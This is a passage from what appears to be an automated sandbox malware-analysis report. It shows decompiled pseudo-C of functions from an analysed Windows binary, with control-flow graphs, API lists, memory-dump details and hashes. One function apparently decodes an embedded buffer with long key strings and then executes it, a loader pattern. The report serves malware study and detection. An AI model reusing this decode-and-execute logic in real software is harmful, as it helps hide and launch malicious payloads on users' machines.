				} while (_t53 != 0);
				_push(_t84 - _t93);
				_push(_t101);
				E009F4430(__ebx,  &_v92, _t93, _t101, _t107);
				_push(0x4f8d53);
				_push(0);
				_push(0x9da0d);
				_push(0x5a);
				_push(0x9fd3e);
				_push(0x4afc);
				_push(0);
				_push(0x8f7a6);
				_push(0x4e72fa);
				_push(0x74d85d);
				_push(0);
				_push(0xfe61);
				_push(0x12342);
				_push(0xb8bac);
				asm("xorps xmm0, xmm0");
				asm("movsd [esp], xmm0");
				asm("movsd xmm0, [0xa14b38]");
				asm("movsd [esp], xmm0");
				E009F3470(__ebx, _t93, _t101, _t107, __ebp, _t122,  &E00A22000, 0x77e, 0x299, 0x30d, 0, 0x21e4, 0, 0x283, 0, 0xcd, 0x7742);
				E009F5790("juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg",  &E00A22000, 0x77e, 0x5b);
				_t117 = _t114 + 0x84;
				_t103 = _v84 + 1;
				_t58 =  >=  ? _v100 :  &_v100;
				_t59 = MultiByteToWideChar(0xfde9, 0,  >=  ? _v100 :  &_v100, _t103, 0, 0);
				_t108 = _t59;
				_v124 = 0;
				_v108 = 0;
				_v104 = 7;
				if(_t108 != 0) {
					_push(0);
					_push(_t108);
					E009F4290(_t81,  &_v124, _t103, _t108);
				} else {
					_v108 = _t108;
					 *(_t117 + 0xc + _t108 * 2) = _t59;
				}
				_t89 =  >=  ? _v132 :  &_v132;
				_t62 =  >=  ? _v108 :  &_v108;
				MultiByteToWideChar(0xfde9, 0,  >=  ? _v108 :  &_v108, _t103,  >=  ? _v132 :  &_v132, _t108);
				_t110 =  >=  ? _v132 :  &_v132;
				E009F5790("WjylxVeF4cWs8QLZ3Lkpssk7r8b6ldTpwpvAFwM7uve7xmjncn4HnSGKYW1EiBage9sgzPxi3TSGmfNYhqUVEqckIW", 0xa22780, 0x22400, 0x5b);
				_push(0x554322);
				_push(0x41243);
				_push(0xa22780);
				_push(0);
				_push( >=  ? _v132 :  &_v132);
				E00A22181(); // executed
				_t94 = _v112;
				_t118 = _t117 + 0x24;
				_pop(_t104);
				if(_t94 < 8) {
					L13:
					_t95 = _v88;
					_t67 = 0;
					_v116 = 0;
					_v112 = 7;
					_v132 = 0;
					if(_t95 < 0x10) {
						L17:
						return _t67;
					} else {
						_t90 = _v108;
						_t96 = _t95 + 1;
						_t68 = _t90;
						if(_t96 < 0x1000) {
							L16:
							_push(_t96);
							_t67 = E009F89FD(_t90);
							_t118 = _t118 + 8;
							goto L17;
						} else {
							_t90 =  *(_t90 - 4);
							_t96 = _t96 + 0x23;
							if(_t68 - _t90 + 0xfffffffc > 0x1f) {
								goto L18;
							} else {
								goto L16;
							}
						}
					}
				} else {
					_t91 = _v132;
					_t98 = 2 + _t94 * 2;
					_t77 = _t91;
					if(_t98 < 0x1000) {
						L12:
						_push(_t98);
						E009F89FD(_t91);
						_t118 = _t118 + 8;
						goto L13;
					} else {
						_t90 =  *(_t91 - 4);
						_t96 = _t98 + 0x23;
						if(_t77 - _t90 + 0xfffffffc > 0x1f) {
							L18:
							E009FCBDF(_t81, _t90, _t96, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							__eflags =  *((intOrPtr*)(_t90 + 0x38));
							_t73 =  !=  ? 0 : 4;
							_t74 = ( !=  ? 0 : 4) |  *(_t90 + 0xc);
							_t75 = ( !=  ? 0 : 4) |  *(_t90 + 0xc) | _v132;
							__eflags = 4;
							return E009F4540(_t81, _t90, _t104, _t112, ( !=  ? 0 : 4) |  *(_t90 + 0xc) | _v132, _v128);
						} else {
							goto L12;
						}
					}
				}
			}












































                                                                                                                                                                          0x009f5bf0
                                                                                                                                                                          0x009f5bf0
                                                                                                                                                                          0x009f5bf0
                                                                                                                                                                          0x009f5bf4
                                                                                                                                                                          0x009f5bfb
                                                                                                                                                                          0x009f5c00
                                                                                                                                                                          0x009f5c0f
                                                                                                                                                                          0x009f5c11
                                                                                                                                                                          0x009f5c11
                                                                                                                                                                          0x009f5c16
                                                                                                                                                                          0x009f5c25
                                                                                                                                                                          0x009f5c2a
                                                                                                                                                                          0x009f5c2f
                                                                                                                                                                          0x009f5c2f
                                                                                                                                                                          0x009f5c32
                                                                                                                                                                          0x009f5c34
                                                                                                                                                                          0x009f5c36
                                                                                                                                                                          0x009f5c39
                                                                                                                                                                          0x009f5c3c
                                                                                                                                                                          0x009f5c3c
                                                                                                                                                                          0x009f5c41
                                                                                                                                                                          0x009f5c43
                                                                                                                                                                          0x009f5c47
                                                                                                                                                                          0x009f5c4b
                                                                                                                                                                          0x009f5c4f
                                                                                                                                                                          0x009f5c57
                                                                                                                                                                          0x009f5c57
                                                                                                                                                                          0x009f5c5a
                                                                                                                                                                          0x009f5c60
                                                                                                                                                                          0x009f5c60
                                                                                                                                                                          0x009f5c62
                                                                                                                                                                          0x009f5c63
                                                                                                                                                                          0x009f5c63
                                                                                                                                                                          0x009f5c69
                                                                                                                                                                          0x009f5c6a
                                                                                                                                                                          0x009f5c6f
                                                                                                                                                                          0x009f5c74
                                                                                                                                                                          0x009f5c79
                                                                                                                                                                          0x009f5c7b
                                                                                                                                                                          0x009f5c80
                                                                                                                                                                          0x009f5c82
                                                                                                                                                                          0x009f5c87
                                                                                                                                                                          0x009f5c8c
                                                                                                                                                                          0x009f5c8e
                                                                                                                                                                          0x009f5c93
                                                                                                                                                                          0x009f5c98
                                                                                                                                                                          0x009f5c9d
                                                                                                                                                                          0x009f5c9f
                                                                                                                                                                          0x009f5ca4
                                                                                                                                                                          0x009f5ca9
                                                                                                                                                                          0x009f5cb1
                                                                                                                                                                          0x009f5cb4
                                                                                                                                                                          0x009f5cb9
                                                                                                                                                                          0x009f5ce3
                                                                                                                                                                          0x009f5cf7
                                                                                                                                                                          0x009f5d0d
                                                                                                                                                                          0x009f5d20
                                                                                                                                                                          0x009f5d26
                                                                                                                                                                          0x009f5d2c
                                                                                                                                                                          0x009f5d3e
                                                                                                                                                                          0x009f5d44
                                                                                                                                                                          0x009f5d46
                                                                                                                                                                          0x009f5d4e
                                                                                                                                                                          0x009f5d56
                                                                                                                                                                          0x009f5d60
                                                                                                                                                                          0x009f5d6d
                                                                                                                                                                          0x009f5d6f
                                                                                                                                                                          0x009f5d74
                                                                                                                                                                          0x009f5d62
                                                                                                                                                                          0x009f5d62
                                                                                                                                                                          0x009f5d66
                                                                                                                                                                          0x009f5d66
                                                                                                                                                                          0x009f5d83
                                                                                                                                                                          0x009f5d92
                                                                                                                                                                          0x009f5da0
                                                                                                                                                                          0x009f5db1
                                                                                                                                                                          0x009f5dc5
                                                                                                                                                                          0x009f5dca
                                                                                                                                                                          0x009f5dcf
                                                                                                                                                                          0x009f5dd4
                                                                                                                                                                          0x009f5dd9
                                                                                                                                                                          0x009f5ddb
                                                                                                                                                                          0x009f5de1
                                                                                                                                                                          0x009f5de3
                                                                                                                                                                          0x009f5de7
                                                                                                                                                                          0x009f5dea
                                                                                                                                                                          0x009f5def
                                                                                                                                                                          0x009f5e20
                                                                                                                                                                          0x009f5e20
                                                                                                                                                                          0x009f5e24
                                                                                                                                                                          0x009f5e26
                                                                                                                                                                          0x009f5e2e
                                                                                                                                                                          0x009f5e36
                                                                                                                                                                          0x009f5e3e
                                                                                                                                                                          0x009f5e69
                                                                                                                                                                          0x009f5e6c
                                                                                                                                                                          0x009f5e40
                                                                                                                                                                          0x009f5e40
                                                                                                                                                                          0x009f5e44
                                                                                                                                                                          0x009f5e45
                                                                                                                                                                          0x009f5e4d
                                                                                                                                                                          0x009f5e5f
                                                                                                                                                                          0x009f5e5f
                                                                                                                                                                          0x009f5e61
                                                                                                                                                                          0x009f5e66
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f5e4f
                                                                                                                                                                          0x009f5e4f
                                                                                                                                                                          0x009f5e52
                                                                                                                                                                          0x009f5e5d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f5e5d
                                                                                                                                                                          0x009f5e4d
                                                                                                                                                                          0x009f5df1
                                                                                                                                                                          0x009f5df1
                                                                                                                                                                          0x009f5df5
                                                                                                                                                                          0x009f5dfc
                                                                                                                                                                          0x009f5e04
                                                                                                                                                                          0x009f5e16
                                                                                                                                                                          0x009f5e16
                                                                                                                                                                          0x009f5e18
                                                                                                                                                                          0x009f5e1d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f5e06
                                                                                                                                                                          0x009f5e06
                                                                                                                                                                          0x009f5e09
                                                                                                                                                                          0x009f5e14
                                                                                                                                                                          0x009f5e6d
                                                                                                                                                                          0x009f5e6d
                                                                                                                                                                          0x009f5e72
                                                                                                                                                                          0x009f5e73
                                                                                                                                                                          0x009f5e74
                                                                                                                                                                          0x009f5e75
                                                                                                                                                                          0x009f5e76
                                                                                                                                                                          0x009f5e77
                                                                                                                                                                          0x009f5e78
                                                                                                                                                                          0x009f5e79
                                                                                                                                                                          0x009f5e7a
                                                                                                                                                                          0x009f5e7b
                                                                                                                                                                          0x009f5e7c
                                                                                                                                                                          0x009f5e7d
                                                                                                                                                                          0x009f5e7e
                                                                                                                                                                          0x009f5e7f
                                                                                                                                                                          0x009f5e8b
                                                                                                                                                                          0x009f5e8e
                                                                                                                                                                          0x009f5e91
                                                                                                                                                                          0x009f5e94
                                                                                                                                                                          0x009f5e94
                                                                                                                                                                          0x009f5e9e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f5e14
                                                                                                                                                                          0x009f5e04

                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateThread.KERNELBASE ref: 009F5C0F
                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 009F5C16
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 009F5D3E
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000000,00000000,00000000), ref: 009F5DA0
                                                                                                                                                                            • Part of subcall function 009F5790: GetCurrentProcess.KERNEL32(?,?,?,?,?,ios_base::failbit set,00000000,?,?,?,?,?,?,?,009F2D37,?), ref: 009F57A6
                                                                                                                                                                          Strings
                                                                                                                                                                          • juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg, xrefs: 009F5D08
                                                                                                                                                                          • WjylxVeF4cWs8QLZ3Lkpssk7r8b6ldTpwpvAFwM7uve7xmjncn4HnSGKYW1EiBage9sgzPxi3TSGmfNYhqUVEqckIW, xrefs: 009F5DC0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharCurrentMultiProcessWide$CreateThread
                                                                                                                                                                          • String ID: WjylxVeF4cWs8QLZ3Lkpssk7r8b6ldTpwpvAFwM7uve7xmjncn4HnSGKYW1EiBage9sgzPxi3TSGmfNYhqUVEqckIW$juL3HXotOjGDez6xcVpB68Jl6CZGpVvV8Jhs3on4DwD5kQrl9MkeYg9u6p5cYtlQ9dYOH8hfsvYVsgKCBsqBVyqCJg
                                                                                                                                                                          • API String ID: 2784346141-1341479164
                                                                                                                                                                          • Opcode ID: aad44791a035754d36b5b8300c2dceec68426dd21d1f94fb003fc2cb2badbb87
                                                                                                                                                                          • Instruction ID: e2e150b4dc0424fc73e1c7d4fb7bf984ee09f704526d50397cd3a83487fcd059
                                                                                                                                                                          • Opcode Fuzzy Hash: aad44791a035754d36b5b8300c2dceec68426dd21d1f94fb003fc2cb2badbb87
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E510670748305BBE310DB24DC46F6B77A5AFC5B04F118A1CF385BB1D0D6B4A6448B86
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0720D Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 299 a0720d-a07226 300 a07228-a07238 call a0082d 299->300 301 a0723c-a07241 299->301 300->301 307 a0723a 300->307 303 a07243-a0724b 301->303 304 a0724e-a07276 call a0b015 301->304 303->304 309 a073d4-a073e5 call 9f8f7d 304->309 310 a0727c-a07288 304->310 307->301 312 a0728a-a0728f 310->312 313 a072bf 310->313 316 a07291-a0729a call 9f9050 312->316 317 a072a4-a072af call a04e1f 312->317 315 a072c1-a072c3 313->315 318 a073c9 315->318 319 a072c9-a072dc call a0b015 315->319 327 a072ba-a072bd 316->327 330 a0729c-a072a2 316->330 326 a072b1 317->326 317->327 324 a073cb-a073d2 call 9f886f 318->324 319->318 332 a072e2-a072f4 call a06676 319->332 324->309 331 a072b7 326->331 327->315 330->331 331->327 335 a072f9-a072fd 332->335 335->318 336 a07303-a0730b 335->336 337 a07345-a07351 336->337 338 a0730d-a07312 336->338 339 a07382 337->339 340 a07353-a07355 337->340 338->324 341 a07318-a0731a 338->341 344 a07384-a07386 339->344 342 a07357-a07360 call 9f9050 340->342 343 a0736a-a07375 call a04e1f 340->343 341->318 345 a07320-a0733a call a06676 341->345 346 a073c2-a073c8 call 9f886f 342->346 358 a07362-a07368 342->358 343->346 360 a07377 343->360 344->346 347 a07388-a073a1 call a06676 344->347 345->324 357 a07340 345->357 346->318 347->346 361 a073a3-a073aa 347->361 357->318 362 a0737d-a07380 358->362 360->362 363 a073e6-a073ec 361->363 364 a073ac-a073ad 361->364 362->344 365 a073ae-a073c0 call a0b091 363->365 364->365 365->346 368 a073ee-a073f5 call 9f886f 365->368 368->324
                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                          			E00A0720D(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t63;
				intOrPtr _t69;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t94;
				void* _t95;
				signed int _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				void* _t103;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0xa44bac; // 0x96877b9b
				_v8 = _t41 ^ _t96;
				_t93 = _a20;
				if(_t93 > 0) {
					_t69 = E00A0082D(_a16, _t93);
					_t103 = _t69 - _t93;
					_t4 = _t69 + 1; // 0x1
					_t93 = _t4;
					if(_t103 >= 0) {
						_t93 = _t69;
					}
				}
				_t88 = _a32;
				if(_a32 == 0) {
					_t88 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t86 = E00A0B015(_t88, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t93, 0, 0);
				_t98 = _t97 + 0x18;
				_v12 = _t86;
				if(_t86 == 0) {
					L39:
					_pop(_t89);
					_pop(_t94);
					_pop(_t71);
					return E009F8F7D(_t46, _t71, _v8 ^ _t96, _t86, _t89, _t94);
				} else {
					_t17 = _t86 + _t86 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t86 + _t86 & _t17;
					if(_t49 == 0) {
						_t72 = 0;
						L15:
						if(_t72 == 0) {
							L37:
							_t95 = 0;
							L38:
							E009F886F(_t72);
							_t46 = _t95;
							goto L39;
						}
						_t51 = E00A0B015(_t88, 1, _a16, _t93, _t72, _t86);
						_t100 = _t98 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t90 = _v12;
						_t53 = E00A06676(_a8, _a12, _t72, _v12, 0, 0, 0, 0, 0); // executed
						_t95 = _t53;
						if(_t95 == 0) {
							goto L37;
						}
						_t86 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t95 + _t95 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t95 + _t95 & _t31;
							if(_t55 == 0) {
								_t91 = 0;
								L31:
								if(_t91 == 0 || E00A06676(_a8, _a12, _t72, _v12, _t91, _t95, 0, 0, 0) == 0) {
									L36:
									E009F886F(_t91);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t95);
									_push(_t91);
									_push(0);
									_push(_a32);
									_t95 = E00A0B091();
									if(_t95 != 0) {
										E009F886F(_t91);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t91 = E00A04E1F(_t55);
								if(_t91 == 0) {
									goto L36;
								}
								 *_t91 = 0xdddd;
								L29:
								_t91 = _t91 + 8;
								goto L31;
							}
							E009F9050(_t55);
							_t91 = _t100;
							if(_t91 == 0) {
								goto L36;
							}
							 *_t91 = 0xcccc;
							goto L29;
						}
						_t63 = _a28;
						if(_t63 == 0) {
							goto L38;
						}
						if(_t95 > _t63) {
							goto L37;
						}
						_t95 = E00A06676(_a8, _a12, _t72, _t90, _a24, _t63, 0, 0, 0);
						if(_t95 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t72 = E00A04E1F(_t49);
						if(_t72 == 0) {
							L13:
							_t86 = _v12;
							goto L15;
						}
						 *_t72 = 0xdddd;
						L12:
						_t72 = _t72 + 8;
						goto L13;
					}
					E009F9050(_t49);
					_t72 = _t98;
					if(_t72 == 0) {
						goto L13;
					}
					 *_t72 = 0xcccc;
					goto L12;
				}
			}





























                                                                                                                                                                          0x00a07212
                                                                                                                                                                          0x00a07213
                                                                                                                                                                          0x00a07214
                                                                                                                                                                          0x00a0721b
                                                                                                                                                                          0x00a07220
                                                                                                                                                                          0x00a07226
                                                                                                                                                                          0x00a0722c
                                                                                                                                                                          0x00a07232
                                                                                                                                                                          0x00a07235
                                                                                                                                                                          0x00a07235
                                                                                                                                                                          0x00a07238
                                                                                                                                                                          0x00a0723a
                                                                                                                                                                          0x00a0723a
                                                                                                                                                                          0x00a07238
                                                                                                                                                                          0x00a0723c
                                                                                                                                                                          0x00a07241
                                                                                                                                                                          0x00a07248
                                                                                                                                                                          0x00a0724b
                                                                                                                                                                          0x00a0724b
                                                                                                                                                                          0x00a0726c
                                                                                                                                                                          0x00a0726e
                                                                                                                                                                          0x00a07271
                                                                                                                                                                          0x00a07276
                                                                                                                                                                          0x00a073d4
                                                                                                                                                                          0x00a073d7
                                                                                                                                                                          0x00a073d8
                                                                                                                                                                          0x00a073d9
                                                                                                                                                                          0x00a073e5
                                                                                                                                                                          0x00a0727c
                                                                                                                                                                          0x00a0727f
                                                                                                                                                                          0x00a07284
                                                                                                                                                                          0x00a07286
                                                                                                                                                                          0x00a07288
                                                                                                                                                                          0x00a072bf
                                                                                                                                                                          0x00a072c1
                                                                                                                                                                          0x00a072c3
                                                                                                                                                                          0x00a073c9
                                                                                                                                                                          0x00a073c9
                                                                                                                                                                          0x00a073cb
                                                                                                                                                                          0x00a073cc
                                                                                                                                                                          0x00a073d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a073d2
                                                                                                                                                                          0x00a072d2
                                                                                                                                                                          0x00a072d7
                                                                                                                                                                          0x00a072dc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a072e2
                                                                                                                                                                          0x00a072f4
                                                                                                                                                                          0x00a072f9
                                                                                                                                                                          0x00a072fd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07303
                                                                                                                                                                          0x00a0730b
                                                                                                                                                                          0x00a07348
                                                                                                                                                                          0x00a0734d
                                                                                                                                                                          0x00a0734f
                                                                                                                                                                          0x00a07351
                                                                                                                                                                          0x00a07382
                                                                                                                                                                          0x00a07384
                                                                                                                                                                          0x00a07386
                                                                                                                                                                          0x00a073c2
                                                                                                                                                                          0x00a073c3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a073a3
                                                                                                                                                                          0x00a073a5
                                                                                                                                                                          0x00a073a6
                                                                                                                                                                          0x00a073aa
                                                                                                                                                                          0x00a073e6
                                                                                                                                                                          0x00a073e9
                                                                                                                                                                          0x00a073ac
                                                                                                                                                                          0x00a073ac
                                                                                                                                                                          0x00a073ad
                                                                                                                                                                          0x00a073ad
                                                                                                                                                                          0x00a073ae
                                                                                                                                                                          0x00a073af
                                                                                                                                                                          0x00a073b0
                                                                                                                                                                          0x00a073b1
                                                                                                                                                                          0x00a073b9
                                                                                                                                                                          0x00a073c0
                                                                                                                                                                          0x00a073ef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a073c0
                                                                                                                                                                          0x00a07386
                                                                                                                                                                          0x00a07355
                                                                                                                                                                          0x00a07370
                                                                                                                                                                          0x00a07375
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07377
                                                                                                                                                                          0x00a0737d
                                                                                                                                                                          0x00a0737d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0737d
                                                                                                                                                                          0x00a07357
                                                                                                                                                                          0x00a0735c
                                                                                                                                                                          0x00a07360
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07362
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07362
                                                                                                                                                                          0x00a0730d
                                                                                                                                                                          0x00a07312
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0731a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07336
                                                                                                                                                                          0x00a0733a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07340
                                                                                                                                                                          0x00a0728f
                                                                                                                                                                          0x00a072aa
                                                                                                                                                                          0x00a072af
                                                                                                                                                                          0x00a072ba
                                                                                                                                                                          0x00a072ba
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a072ba
                                                                                                                                                                          0x00a072b1
                                                                                                                                                                          0x00a072b7
                                                                                                                                                                          0x00a072b7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a072b7
                                                                                                                                                                          0x00a07291
                                                                                                                                                                          0x00a07296
                                                                                                                                                                          0x00a0729a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0729c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0729c

                                                                                                                                                                          APIs
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00A07291
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00A07357
                                                                                                                                                                          • __freea.LIBCMT ref: 00A073C3
                                                                                                                                                                            • Part of subcall function 00A04E1F: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,009F9867,00000002,00000000,?,?,?,009F1D1E,00000001,00000004), ref: 00A04E51
                                                                                                                                                                          • __freea.LIBCMT ref: 00A073CC
                                                                                                                                                                          • __freea.LIBCMT ref: 00A073EF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1423051803-0
                                                                                                                                                                          • Opcode ID: 5383bb2fe69d10c76486be558e7c7845ecc6e85bae3d7bf01ce50c7340be5ecd
                                                                                                                                                                          • Instruction ID: 501fa815d019df131e10d6e3a72ff9d8d328c5b0a165bc09f15d07db689976c8
                                                                                                                                                                          • Opcode Fuzzy Hash: 5383bb2fe69d10c76486be558e7c7845ecc6e85bae3d7bf01ce50c7340be5ecd
                                                                                                                                                                          • Instruction Fuzzy Hash: A7519172A0421EAFEB259F54ED41FBF36A9EB84750F154129FD04AB190EB31EC10A7A1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A02337 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 371 a02337-a02358 call a04e1f 374 a02475-a02478 371->374 375 a0235e-a02392 call a02273 371->375 378 a02395-a023aa call a0b373 375->378 381 a023b0-a023bd 378->381 382 a024c5-a024fb call 9fcbfc 378->382 384 a023c0-a023c6 381->384 393 a024fd-a024ff 382->393 394 a0251e-a0253a 382->394 386 a023e6-a023e8 384->386 387 a023c8-a023cb 384->387 388 a023eb-a02425 call a02273 386->388 390 a023e2-a023e4 387->390 391 a023cd-a023d5 387->391 388->378 401 a0242b-a0242f 388->401 390->388 391->386 395 a023d7-a023e0 391->395 397 a02511-a02519 393->397 398 a02501-a0250c call a027c2 393->398 399 a02540-a02544 394->399 400 a0279a-a0279b call a02337 394->400 395->384 395->390 404 a027a1-a027af call 9f8f7d 397->404 398->404 405 a026b2-a026d9 call a01ead 399->405 406 a0254a-a0254f 399->406 410 a027a0 400->410 407 a02431-a02439 401->407 408 a02479-a02488 call a0447f 401->408 405->404 425 a026df-a026e6 405->425 406->405 412 a02555-a0255a 406->412 415 a0243b-a02441 407->415 416 a0244c-a02451 407->416 428 a0248a-a02490 408->428 429 a0249b-a024a0 408->429 410->404 412->405 418 a02560-a02577 call a0d829 412->418 415->416 421 a02443-a0244b call a0447f 415->421 422 a02463-a02471 416->422 423 a02453-a02458 416->423 440 a026ab-a026ad 418->440 441 a0257d-a02587 418->441 421->416 426 a02474 422->426 423->422 431 a0245a-a02462 call a0447f 423->431 427 a026ec-a026ee 425->427 426->374 433 a026f4-a026f6 427->433 434 a02775 427->434 428->429 435 a02492-a0249a call a0447f 428->435 437 a024b2-a024c3 429->437 438 a024a2-a024a7 429->438 431->422 444 a026fc-a02708 433->444 442 a0277b-a02788 434->442 435->429 437->426 438->437 446 a024a9-a024b1 call a0447f 438->446 440->404 441->440 443 a0258d-a02593 441->443 442->427 448 a0278e-a02790 442->448 443->440 449 a02599-a025a4 443->449 450 a0270a-a0270e 444->450 451 a0273d-a02742 444->451 446->437 448->400 454 a02792-a02794 448->454 455 a025ae-a025bc call a03e58 449->455 456 a02710-a02725 450->456 457 a02737-a0273b 450->457 458 a02744-a02746 451->458 454->400 460 a02796-a02798 454->460 467 a025da-a025e9 455->467 468 a025be-a025c0 455->468 456->451 462 a02727-a02735 456->462 457->458 463 a02774 458->463 464 a02748-a02761 call a027c2 458->464 460->404 462->444 462->457 463->434 472 a02763-a02766 464->472 473 a02768-a02772 464->473 467->455 471 a025eb-a0260b call a0d7d0 467->471 470 a025c3-a025d0 468->470 470->470 474 a025d2-a025d8 470->474 477 a02619-a02620 471->477 478 a0260d-a02613 471->478 472->434 473->442 474->467 474->471 479 a02681 477->479 480 a02622-a0263a call a0b4b3 477->480 478->440 478->477 481 a02687-a02692 479->481 486 a02640-a02648 480->486 487 a027b5-a027c1 call 9fcbfc 480->487 484 a02694-a02697 481->484 485 a0269a-a0269d 481->485 484->485 485->418 488 a026a3-a026a5 485->488 489 